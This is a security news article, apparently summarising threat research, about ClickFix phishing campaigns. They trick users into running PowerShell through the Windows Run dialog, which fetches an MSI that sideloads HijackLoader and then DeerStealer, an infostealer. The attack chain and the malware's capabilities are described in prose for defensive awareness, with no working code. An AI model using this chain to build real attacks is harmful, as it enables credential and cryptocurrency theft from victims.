The eSentire’s Threat Response Unit (TRU) observed a notable increase in campaigns exploiting the Windows Run Prompt to deliver DeerStealer an advanced information-stealing malware via carefully orchestrated attack chains.
These incidents often begin with the ClickFix technique, wherein users are lured to a phishing page that instructs them to execute a malicious command directly in the Windows Run dialog (“Win+R”), bypassing traditional endpoint protections.
Threat Actors Leverage ClickFix
The typical attack sequence commences when the victim, redirected from a phishing site, is prompted to run an encoded PowerShell command.
This script utilizes the Windows LOLBin curl.exe to retrieve a malicious Microsoft Installer (now.msi) from a remote server.
Once executed using msiexec.exe, this MSI package drops several files into the C:\ProgramData directory and initiates a signed but exploited COMODO Internet Security binary.
The legitimate binary (EngineX_Co64.exe) is subsequently manipulated to sideload a malicious, unsigned cmdres.dll.
This DLL is altered to hijack the normal control flow, facilitating the injection and execution of the next malware stage without alerting endpoint security.
At the core of this campaign is HijackLoader, a modular loader first identified in 2023, recognized for its use of steganography and encrypted PNGs to conceal configuration data and modules.
Once active, HijackLoader resolves necessary APIs dynamically, decrypts its payload using custom cryptographic routines, and then module-stomps legitimate binaries (such as vssapi.dll and d3d9.dll) to inject additional code and evade detection. The loader finally deploys DeerStealer as the end payload.
DeerStealer Continues to Evolve
DeerStealer, also referred to as XFiles Spyware in underground forums by its developer “LuciferXfiles,” boasts a robust suite of features.
The malware is capable of harvesting passwords, credit card data, browser cookies, and autofill entries from over 50 browsers, alongside credentials from instant messaging, VPN, email, and gaming clients.
Notably, its cryptocurrency “clipper” function can hijack clipboard data to substitute wallet addresses, supporting over a dozen cryptocurrency formats.
DeerStealer can also target 800+ browser extensions (with custom targeting possible), as well as desktop-based and USB crypto wallets.
The threat actor’s toolkit is continually evolving, with the current version exhibiting enhanced code obfuscation, anti-analysis mechanisms, and a planned roadmap promising macOS support, AI-based automation, and improved remote persistence via hidden VNC modules.
DeerStealer leverages HTTP(S) with custom encryption for C2 communications, implementing hardware- and install-specific fingerprinting to uniquely identify victim systems and streamline exfiltration.
The malware is sold via a tiered subscription model, granting different levels of functionality including custom ClickFix scripts, EV signing, and broader process management to buyers depending on their payment tier (ranging from $200 to $3,000 per month).
Control panels accessible to operators offer extensive management capabilities, including multi-victim oversight, analytics dashboards, and tools for selective file grabbing.
According to the Report, Security researchers warn that the continued abuse of LOLBins (living-off-the-land binaries) and the direct exploitation of user trust in system dialogs such as the Windows Run prompt render traditional endpoint detection increasingly ineffective.
Defensive strategies should focus on user training, rigorous endpoint monitoring for abnormal process chains, and the adoption of behavioral analytics capable of detecting adversary tradecraft beyond signature-based models.
The rapid pace of DeerStealer’s evolution, backed by professional malware-as-a-service models, underscores the persistent risk posed to both enterprises and individuals alike.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates
